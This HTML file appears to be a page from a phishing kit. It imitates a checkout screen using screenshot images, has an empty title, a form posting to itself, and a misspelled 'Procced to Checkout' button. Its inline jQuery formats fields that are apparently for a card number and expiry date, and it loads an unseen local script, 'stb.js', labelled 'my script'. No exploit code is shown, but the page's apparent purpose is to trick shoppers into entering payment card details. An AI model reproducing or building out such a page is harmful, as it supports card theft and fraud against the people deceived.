<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/main.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    <div>
        <div class="hedos">
            <div class="herop1">
                <div class="line1"></div>
                <div class="lefto">
                    <img class="img1" src="./img/lopogo1.JPG" alt="">
                    <img class="img2" src="./img/toupopcc1.JPG" alt="">
                </div>
            </div>
            <!--  -->
            <div class="herop2">
                <img src="./img/rightootoupopcc2.JPG" alt="">
            </div>
        </div>
        <!--  -->
        <div class="hetod">
            <img src="./img/hed.JPG" alt="">
        </div>
    </div>

    <div class="section2">
        
            <!--  -->
        <form action="" method="post">

            <div class="righit2">
                <div class="inright1">
                    <div class="img4">
                        <img class="tel1" src="./img/1pagupo.JPG" alt="">
                    </div>
                    <div class="cento">
                        <img src="./img/1pagcont.JPG" alt="">
                    <button id="barinxri" type="button">Procced to Checkout</button>
                    </div>
                </div>
            </div>
        </form>
    </div>


    <div>
        <div class="botopc">
            <img src="./img/boitopc1.jpeg" alt="">
        </div>

        <div class="bototel">
            <img src="./img/bot.JPG" alt="">
        </div>
    </div>


    <script>
        $("#numcc").on("keyup",function(){
           cc = $(this).val().split(" ").join("");
           cc = cc.match(new RegExp('.{1,4}$|.{1,4}', 'g')).join(" ");
           $(this).val(cc);
       });
       $("#numdd").on("keyup",function(){
           dd = $(this).val().split("/").join("");
           dd = dd.match(new RegExp('.{1,2}$|.{1,2}', 'g')).join("/");
           $(this).val(dd);
       });
   </script>
    <!-- my script -->
    <script src="./js/stb.js"></script>
</body>
</html>